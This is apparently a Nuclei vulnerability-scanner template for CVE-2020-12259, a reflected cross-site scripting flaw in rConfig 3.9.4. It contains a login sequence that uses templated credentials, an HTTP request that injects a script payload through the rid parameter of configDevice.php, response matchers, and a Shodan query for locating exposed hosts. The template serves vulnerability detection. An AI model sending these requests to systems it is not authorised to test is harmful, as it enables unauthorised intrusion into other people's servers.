nuclei-templates/http/cves/2020/CVE-2020-12259.yaml

55 lines
1.9 KiB
YAML
Raw Normal View History

2023-10-17 07:20:28 +00:00
id: CVE-2020-12259
2023-10-17 07:20:28 +00:00
info:
name: rConfig 3.9.4 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
rConfig 3.9.4 is vulnerable to reflected XSS. The configDevice.php file improperly validates user input. An attacker can exploit this vulnerability by crafting arbitrary JavaScript in the rid GET parameter of devicemgmnt.php
reference:
- https://www.rconfig.com/downloads/rconfig-3.9.4.zip
- https://gist.github.com/farid007/8855031bad0e497264e4879efb5bc9f8
- https://nvd.nist.gov/vuln/detail/CVE-2020-12259
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2020-12259
cwe-id: CWE-79
epss-score: 0.16256
epss-percentile: 0.95392
cpe: cpe:2.3:a:rconfig:rconfig:3.9.4:*:*:*:*:*:*:*
2023-10-17 07:20:28 +00:00
metadata:
verified: "true"
max-request: 3
vendor: rconfig
product: rconfig
2023-10-17 07:20:28 +00:00
shodan-query: http.title:"rConfig"
tags: cve,cve2020,rconfig,authenticated,xss
http:
- raw:
- |
GET /login.php HTTP/1.1
Host: {{Hostname}}
- |
POST /lib/crud/userprocess.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user={{username}}&pass={{password}}&sublogin=1
- |
GET /configDevice.php?rid="><script>alert(document.domain)</script> HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
host-redirects: true
matchers:
- type: dsl
dsl:
- 'status_code_3 == 200'
- 'contains(body_3, "<script>alert(document.domain)</script>") && contains(body_3, "rConfig - Configuration Management")'
- 'contains(content_type_3, "text/html")'
condition: and
# digest: 4a0a00473045022073196f1f1b309c44de6a2fe0bb80337fea75008d3027c17bf7fbea60aa87ba64022100f2a007826df942193b99c7041132cafb3dc9a5654f1f88b810f14afe8f74b0c1:922c64590222798bb761d5b6d8e72950